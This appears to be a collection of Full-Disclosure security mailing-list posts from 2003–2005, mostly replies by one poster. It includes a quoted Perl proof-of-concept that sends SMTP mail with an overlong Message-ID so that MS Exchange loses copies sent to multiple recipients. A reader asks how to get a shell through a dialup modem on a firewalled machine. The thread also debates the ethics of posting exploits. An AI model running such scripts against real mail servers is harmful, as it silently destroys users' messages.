Virus Found in message "[Full-Disclosure] Virus whether the scanners say so or not?"
??? Norton AntiVirus found a virus in an attachment you ([EMAIL PROTECTED]) sent to [EMAIL PROTECTED] To ensure the recipient(s) are able to use the files you sent, perform a virus scan on your computer, clean any infected files, then resend this attachment. Attachment: wupdated.zip Virus name: Multiple viruses found. Please see individual log messages. Action taken: Clean failed : Quarantine succeeded : Sender : [EMAIL PROTECTED] File status: Still contains 1 infected items Scan type: Realtime Protection Scan Event: Virus Found! Virus name: W32.HLLW.Moega File: wupdated.zip>>wupdated.exe Location: Mail System Computer: mani User: mani Action taken: Clean failed : Quarantine succeeded : Date found: Mon Sep 01 19:21:45 2003 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Computer problem ties up British Airways
Guess it happens to the best of them. Any other evidence? -Original Message- From: Saeed, Iqbal [mailto:[EMAIL PROTECTED] Sent: Monday, September 08, 2003 12:16 Subject: FYI: Computer problem ties up British Airways London September 8, 2003 Hundreds of British Airways passengers around the world were delayed and transferred to other flights after a two-hour electrical failure at Heathrow airport shut down the company's global computer network, the company said. The failure on Friday affected the system used for checking in passengers. The worst hit airport was Heathrow itself, where 11 flights were cancelled and others delayed by up to two hours before the system was eventually restored. "We have got a team of IT experts investigating the cause of the problem,'' a company spokeswoman said. ``At this stage we do not know what happened." AFP ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)
Yup that's true the exploit actually didnt worked even if I was logged in as Administrator or a normal user in Windows XPSp1 with all patches installed except 811394. Regards, Syed Imran Ali Senior Network Engineer (T) +92-300-9256202 :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: The information contained in this e-mail is confidential and may be privileged. It is intended for the addressee only. If you have received this e-mail in error please notify us immediately, then delete this e-mail. You should not copy it for any purpose, or disclose its contents to any other person. We cannot accept any responsibility for viruses, so please scan all attachments. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. The company does not take any responsibility for the views of the author -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gregh Sent: Friday, October 10, 2003 3:07 AM To: Irwan Hadi Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) - Original Message - From: "Irwan Hadi" <[EMAIL PROTECTED]> To: "gregh" <[EMAIL PROTECTED]> Cc: "Stephen" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Thursday, October 09, 2003 3:55 PM Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!) > On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: > > > > > - Original Message - > > From: "Stephen" <[EMAIL PROTECTED]> > > To: <[EMAIL PROTECTED]> > > Sent: Thursday, October 09, 2003 5:19 AM > > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) > > > > > > > > > > It becomes really dangerous to use IE ... > > > > > > http://www.k-otik.com/WMPLAYER-TEST/ > > > > > > God bless Mozilla > > > > > > http://www.mozilla.org/ > > > > > > > > > Your test didn't work on my IESP1 under XP with all patches excepting > > 811394. Absolutely no effect on WMP. My original WMP remains and works. > > It depends whether you were logging as a privileged user or not. > If not, then your browser can't delete the wmplayer.exe file, because > the only user that can change/delete the wmplayer.exe file is privileged > user. > C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe > C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R > BUILTIN\Power Users:C > BUILTIN\Administrators:F > NT AUTHORITY\SYSTEM:F > > > C:\PROGRA~1\Windows Media Player> > > The problem is just too many people are running their Windows with > Full Privileges. > Didnt matter what I logged in as. I normally am ADMIN, naturally but a priveleged user, a very limited user - no difference. The exploit didnt work. Greg. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IRC DCC Exploit
H seems like that he want to d/c other ppl from IRC too ;) Bro. Go through with the previous posts of this week on F.D. That would definitely help you to find the answers of your questions. Regards, Syed Imran Ali Senior Network Engineer Karachi/Pakistan (T) +92-300-9256202 :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~: The information contained in this e-mail is confidential and may be privileged. It is intended for the addressee only. If you have received this e-mail in error please notify us immediately, then delete this e-mail. You should not copy it for any purpose, or disclose its contents to any other person. We cannot accept any responsibility for viruses, so please scan all attachments. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. The company does not take any responsibility for the views of the author -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Farrukh Hussain Sent: Friday, October 17, 2003 3:01 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] IRC DCC Exploit Hey, I want to know about DCC Exploit, 1) What is Irc DCC Exploit ? 2) How it works ? 3) What is its Source/code ? 4) How to protect from this exploit ? 5) And in which language people were made ? I am asking you about it because it is harmfull full, when i join channel i disconnected 4 times with Critical Error. so please reply me as soon as possible. Thanks. Best Regards from, Farrukh Hussain. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] A webserver
Hello Puneet, Ask your cable operator to redirect incoming port 80 requests to your machine (I am sure he wont do that, cuz he is probably running his own web server too). In this case configure your web server on any different port for e.g. "8090" and ask him to Map that port on your machine's IP. Goto www.dynu.com and register http://puneet.dynu.com for free. Now others can access your server through http://puneet.dynu.com:8090/ Hope u have got the answer. Regards, Syed Imran Ali -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Puneet Sent: Friday, February 13, 2004 7:27 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] A webserver Hi...I'm from India. I am using net from cable connection and my PC is in a LAN. Can anyone tell me how can I make my computer a webserver or an FTP server. Please reply.I need this. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] www.microsoft.com
Title: www.microsoft.com Same here Regards, Syed Imran Ali -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kane Lightowler Sent: Friday, August 15, 2003 10:07 AM To: '[EMAIL PROTECTED]' Subject: [Full-Disclosure] www.microsoft.com Looks like www.microsoft.com is dead (110) Connection timed out Regards, Kane Lightowler CONFIDENTIALITY: This e-mail and any attachments are confidential and may be privileged. If you are not a named recipient,please notify the sender immediately and do not disclose the contents to another person, use it for any purpose or store or copy the information in any medium. 1
RE: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how
I agree with Randal's point of view.
Dunno abt others...
Although we have been discussing this exploit posting issue since long
time... the latest one was cyber punk's, h ..
4 C.P : h1ya, u rem. WFD ;) sh0utS t0 U agAin. ;)
Regards,
S. Imran Ali
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
Sent: Thursday, May 13, 2004 6:45 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so
lets post how
I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the "exploit" example because, in his
own words,
<|>I think some people know how to use this "FEATURE" ... I hope this post
<|>will speed up the fix release!
Exactly in what way do you think this should speed up the release?
Granted, this is a "lost" email exploit. But what if it was a dangerous
exploit? I have seen these also posted.
I know of "script Kiddies" who would never be able to find the exploit but
are part of the group who "know how to use this 'FEATURE'...". They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
Administrator I have no need for the exploit but for the knowledge. I have
found no better place then here for that. Then on the other hand you all
give out the exploits for confirmation which is needed also. Just some of my
personal inward ramblings.
thank you
Randall M
<|>--__--__--
<|>
<|>Message: 20
<|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
<|>From: [EMAIL PROTECTED]
<|>To: [EMAIL PROTECTED]
<|>Subject: [Full-Disclosure] MS Exchange message lost
<|>
<|>* MS Exchange duplicate message fault (message lost)
<|>*
<|>* MS Exchange (all versions affected) duplicate message fault
<|>*
<|>* I discovered this bug independently on 10, 2003
<|>*
<|>* public post 05, 2004
<|>*
<|>* Helmut Schmitz < [EMAIL PROTECTED] >
<|>*
<|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */
<|>
<|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
<|>Messages with long message ids (>189 bytes?)to more than one recipient
<|>(cc),
<|>the message will not delivered correctly ... there is no correct logging
<|>!!,
<|>the messages will be delivered to only one Recipient ... the message to
<|>the
<|>other will be lost !!
<|>
<|>I have send this issue to Microsoft (10.2003) ... some months later
<|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
<|>some reg settings fixes (workaround ;-) the problem.
<|>
<|>Perl Example (test exploit) ...
<|>
<|>#!/usr/bin/perl -w
<|>use Net::SMTP;
<|>$from = '[EMAIL PROTECTED]';
<|>$to = '[EMAIL PROTECTED]';
<|>$cc = '[EMAIL PROTECTED]';
<|>$subject = 'Test Email';
<|>$smtp = Net::SMTP->new('yourmailserver');
<|>$smtp->mail($from);
<|>$smtp->to($to);
<|>$smtp->cc($cc);
<|>$smtp->data();
<|>$smtp->datasend("To: <$to>\n");
<|>$smtp->datasend("Cc: <$cc>\n");
<|>$smtp->datasend("From: <$from>\n");
<|>$smtp->datasend("Subject: $subject\n");
<|>$smtp->datasend("Message-ID:
<|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
<|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
<|>feejktmhedgedherngrondljzhng> \n");
<|>$smtp->datasend("Hallo\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->dataend();
<|>$smtp->quit;
<|>
<|>Background:
<|>Duplicate detection is decided by three factors. These are MessageID,
<|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
<|>store. These are used to build a unique key when the message is
<|>submitted.
<|>If all the factors are the same value, then we recognize the message as
<|>duplicate.
<|>
<|>###
<|>
<|>I think some people know how to use this "FEATURE" ... I hope this post
<|>will speed up the fix release!
<|>
<|>Regards,
<|>Helmut Schmitz
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] !! Internet Explorer !!
Get Pest Petrol... Regards, S. Imran Ali -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Farrukh Hussain Sent: Friday, June 11, 2004 7:35 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] !! Internet Explorer !! Hey, Yesterday i was visitng web sites. so i felt my computer slow. and that time i shutdown my computer and go somewhere. now today i restarted my computer and when i open internet explorer i got Web Page. Which i didn't SET. and now i am not able to write www.anydomain.com . when i type it gave me error. and it is also opening Popup window advertise. and it has 2 files in my windows directory. when i removed them it comes back again. So please tell me, 1) what is it? 2) how i can delete/remove it ? 3) how i got this thing ? 4) how to secure from this thing ? here is the 1 page from many pages in internet explorer. http://www.farukh.com/1.GIF Best Regards from, Farrukh Hussain. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Yahoo upgraded all accounts to 100MB
Hiya, It is nice to see my inbox today, having 100MB or storage space, 84% remaining. Yahoo now allows up to 10MB attachment too I am not sure about .co.uk is still allowing POP or not with 100MB, as it was with 6MB. Regards, S. Imran Ali ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Awake a modem with AT commands
Hmmm, As far as I think you can only awake a dialup modem, if u gains access of the pc. Otherwise to bind a shell on a modem you need to initialize it first and establish a connection with it. I don't know if you specifically asked for DSL or Cable modems or what you exactly wanna do with it. As far as AT commands are your concerns, I think most of the ppl on the list can help you out. Btw, elucidate ur question please. Regards, S. Imran Ali X-WFD Member (hay m0r0n if u r 0n the list, contact me. Thnx) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of action09 Sent: February 21, 2005 6:17 PM To: full-disclosure@lists.netsys.com Subject: [Full-Disclosure] Awake a modem with AT commands Hi! I'm looking for specially crafted Hayes AT commands to awake a computer ( behind a firewall, connected to an internal LAN , but --also-- connected to an external phone line ) . The machine is a Windows 2K Pro, someone can help please ? Is there a way to awake a dialup modem, have a shell on it after ? how ? Thx a by advance dor any clue. sorry for my bad english. A-Xess ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands
>True, my first modem was 300 baud, >but if you try to issue an AT command to a DSL or cable modem, I think you >will not get a response. True my friend, I didn't say n e thing about issuing AT commands to DSL or Cable modems. Did I? As far as I know they do not respond. (and you said that too). It is good to hear that your first modem was 300. mine was 1400. so of course u have been using them longer then me. Did u get the clue about her question? Thnx for response n e way. Regards, Imran Ali -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Curt Purdy Sent: February 26, 2005 8:43 AM To: 'Syed Imran Ali'; 'action09'; full-disclosure@lists.netsys.com Subject: RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands Syed Imran Ali wrote: > I don't know if you specifically asked for DSL or Cable > modems or what you exactly wanna do with it. > > As far as AT commands are your concerns, I think most of the > ppl on the list can help you out. > > Btw, elucidate ur question please. Mr. Ali, Please be aware that action09 does not need to "elucidate", as you obviously do not understand what she was saying to start with. I do not mean to mock you, but you really need to get a clue. True, my first modem was 300 baud, but if you try to issue an AT command to a DSL or cable modem, I think you will not get a response. Curt Purdy CISSP, GSEC, CNE, MCSE+I, CCDA Information Security Engineer DP Solutions - If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- former White House cybersecurity czar Richard Clarke ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
